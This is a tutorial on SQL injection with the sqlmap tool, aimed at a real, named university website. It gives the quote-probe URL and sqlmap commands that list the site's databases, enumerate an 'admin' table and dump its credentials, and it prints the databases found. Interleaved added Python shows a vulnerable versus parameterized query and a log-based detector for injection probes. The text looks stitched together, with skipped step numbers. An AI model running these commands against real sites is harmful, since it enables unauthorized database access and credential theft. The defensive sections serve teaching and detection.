By: Anuj Khandelwal
Warning: Before the testing, the owner of the website was informed, and the vulnerability has now been patched. We do not endorse hacking live websites or testing on live domains without official authorization. Respect your country's legal system; this paper is for educational purposes only, to understand attacks on websites and how to countermeasure them. Any actions performed by readers after reading this paper are their own responsibility; the author accepts no responsibility for readers' trials and actions.
SQLMAP: sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over back-end database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester, and a broad range of switches ranging from database fingerprinting, through fetching data from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.
Requirements for the testing:
1. VMware Player
2. BackTrack 5 Linux operating system
3. Wi-Fi connection
4. Vulnerable site to test
Step 2: Type http://www.hu.edu.pk/viewfaculty.php?id=6' in the URL bar to check whether the site is vulnerable. If you get an error such as "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''6'' order by posasc' at line 1" on the website, that means the website is vulnerable: the single quote closed the string literal in the application's query early, and the database rejected the rest of the statement.
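The error in Step 2 comes from building the SQL statement by string concatenation. The following added example (my own illustration, not code from this paper or from the hu.edu.pk site; the faculty table, its columns and the row values are constructed assumptions) reproduces that defect against an in-memory SQLite database and shows the hardened form beside it: the same quote probe produces a syntax error in the vulnerable function and is simply rejected by the parameterized one, which is the countermeasure a developer would apply.

```python
import sqlite3

# Constructed stand-in for the faculty table behind viewfaculty.php. The
# table and column names are assumptions; the real schema is not on the page.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE faculty (id INTEGER, name TEXT, pos INTEGER)")
    conn.executemany("INSERT INTO faculty VALUES (?, ?, ?)",
                     [(6, "Faculty Six", 2), (12, "Faculty Twelve", 1)])
    return conn

CONN = make_db()

def view_faculty_vulnerable(id_param, conn=CONN):
    """Builds the query by string concatenation, the defect Step 2 detects."""
    # A quote in id_param ends the literal early, so id=6' yields
    #   ... WHERE id='6'' ORDER BY pos ASC
    # which is an unterminated string and therefore a syntax error.
    sql = "SELECT name FROM faculty WHERE id='" + id_param + "' ORDER BY pos ASC"
    try:
        return [row[0] for row in conn.execute(sql)]
    except sqlite3.OperationalError as e:
        # The live site leaked this message to the browser; a defender logs it
        # server-side and returns a generic error page instead.
        return "SQL error: " + str(e)

def view_faculty_fixed(id_param, conn=CONN):
    """Hardened form: validate the type, then bind the value as a parameter."""
    if not id_param.isdigit():
        return []  # non-numeric ids are "not found" (or an HTTP 400)
    sql = "SELECT name FROM faculty WHERE id=? ORDER BY pos ASC"
    return [row[0] for row in conn.execute(sql, (int(id_param),))]

if __name__ == "__main__":
    for probe in ("6", "6'", "6' OR '1'='1"):
        print(repr(probe), "vulnerable:", view_faculty_vulnerable(probe),
              "| fixed:", view_faculty_fixed(probe))
```

Run it directly to see the three probes side by side: the plain id behaves the same in both functions, the quote probe raises the error in the vulnerable one, and the tautology returns every row from the vulnerable one while the fixed one returns nothing, because the bound value is never parsed as SQL.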
Step 3: Open VMware Player with BackTrack as your virtual machine. The terminal screen opens, as shown in the figure.
Step 5: Write cd /pentest/database/sqlmap and press Enter.
Step 7: Now, to get the website's databases, run the following command through Python:
python ./sqlmap.py -u www.hu.edu.pk/viewfaculty.php?id=12 --dbs
As you can see, we have found 3 databases:
available databases [3]:
[*] c3results
[*] information_schema
[*] test
Let's see what the first database will provide us.
Step 9: Write the command
python ./sqlmap.py -u www.hu.edu.pk/viewfaculty.php?id=12 -T admin --columns
By entering this, you would get something like:
+---------+------------------+
| Column | Type |
Step 10: Write the final command
python ./sqlmap.py -u www.hu.edu.pk/viewfaculty.php?id=12 -T admin -U test --dump
and press the ENTER key. On any other website we would have got the admin username and password, but on this site the data is entered through FTP. Hence, we get to see the username and password.
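Steps 2, 7, 9 and 10 all leave traces in the web server's access log: the quote probe, the boolean comparisons sqlmap sends while fingerprinting, and (unless the operator changes it) a User-Agent that names the tool. The following added example (my own code, not part of this paper or of sqlmap) shows how a site owner would detect such a run. The Apache combined-format log lines are constructed: the IP addresses are documentation ranges, the timestamps are invented, and the sqlmap/version (url) user agent is assumed to follow sqlmap's default shape.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, unquote_plus

# Constructed sample access log (combined format). Fictional IPs and times;
# the request paths echo the viewfaculty.php?id= parameter only as input.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Oct/2012:13:55:36 +0500] "GET /viewfaculty.php?id=6 HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2012:13:55:40 +0500] "GET /viewfaculty.php?id=6%27 HTTP/1.1" 200 712 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2012:13:56:02 +0500] "GET /viewfaculty.php?id=12%20AND%201%3D1 HTTP/1.1" 200 5123 "-" "sqlmap/1.0-dev (http://sqlmap.org)"
203.0.113.7 - - [10/Oct/2012:13:56:03 +0500] "GET /viewfaculty.php?id=12%20AND%201%3D2 HTTP/1.1" 200 701 "-" "sqlmap/1.0-dev (http://sqlmap.org)"
198.51.100.4 - - [10/Oct/2012:14:01:11 +0500] "GET /viewfaculty.php?id=7 HTTP/1.1" 200 5090 "-" "Mozilla/5.0"
"""

# Apache "combined" log format: ip ident user [time] "request" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Indicators checked against the URL-decoded query string. They mirror the
# probes shown in this write-up: a stray quote, boolean comparisons used for
# fingerprinting, and ORDER BY / UNION used during column enumeration.
QUERY_PATTERNS = {
    "quote_in_param": re.compile(r"['\"]"),
    "boolean_probe": re.compile(r"\b(?:and|or)\b\s+\d+\s*=\s*\d+", re.I),
    "union_select": re.compile(r"\bunion\b\s+(?:all\s+)?select\b", re.I),
    "order_by": re.compile(r"\border\s+by\b", re.I),
}
TOOL_UA = re.compile(r"sqlmap", re.I)  # default UA names the tool (assumed shape)

def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None

def classify(entry):
    """Return the indicator names that fire for one parsed request."""
    reasons = []
    if TOOL_UA.search(entry["ua"]):
        reasons.append("sqlmap_user_agent")
    query = unquote_plus(urlsplit(entry["target"]).query)
    for name, pattern in QUERY_PATTERNS.items():
        if pattern.search(query):
            reasons.append(name)
    return reasons

def analyze(log_text, threshold=2):
    """Aggregate indicators per client IP; flag IPs with >= threshold hits.

    Returns (per_ip_stats, flagged_ips). Counting per IP matters: a single
    quote in a query can be a typo, a burst of probes from one source is not.
    """
    per_ip = defaultdict(lambda: {"requests": 0, "suspicious": 0, "indicators": set()})
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue  # malformed line; a real pipeline would count these too
        stats = per_ip[entry["ip"]]
        stats["requests"] += 1
        reasons = classify(entry)
        if reasons:
            stats["suspicious"] += 1
            stats["indicators"].update(reasons)
    flagged = sorted(ip for ip, s in per_ip.items() if s["suspicious"] >= threshold)
    return dict(per_ip), flagged

if __name__ == "__main__":
    stats, flagged = analyze(SAMPLE_LOG)
    for ip in flagged:
        s = stats[ip]
        print(ip, s["suspicious"], "of", s["requests"], "requests:",
              ", ".join(sorted(s["indicators"])))
```

The user-agent check is the cheapest signal but also the weakest, since the agent string is trivially changed; the query-string indicators and the per-source count are what carry the detection when it is. Response size is worth adding as a fourth signal: the constructed lines show the same page shrinking from about 5 KB to a few hundred bytes whenever the injected condition is false, which is exactly the difference boolean-based testing relies on.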
About the Author
Anuj Khandelwal, Web Security Researcher @ TechDefence Pvt. LTD. Connect with me: www.facebook.com/anujonthemove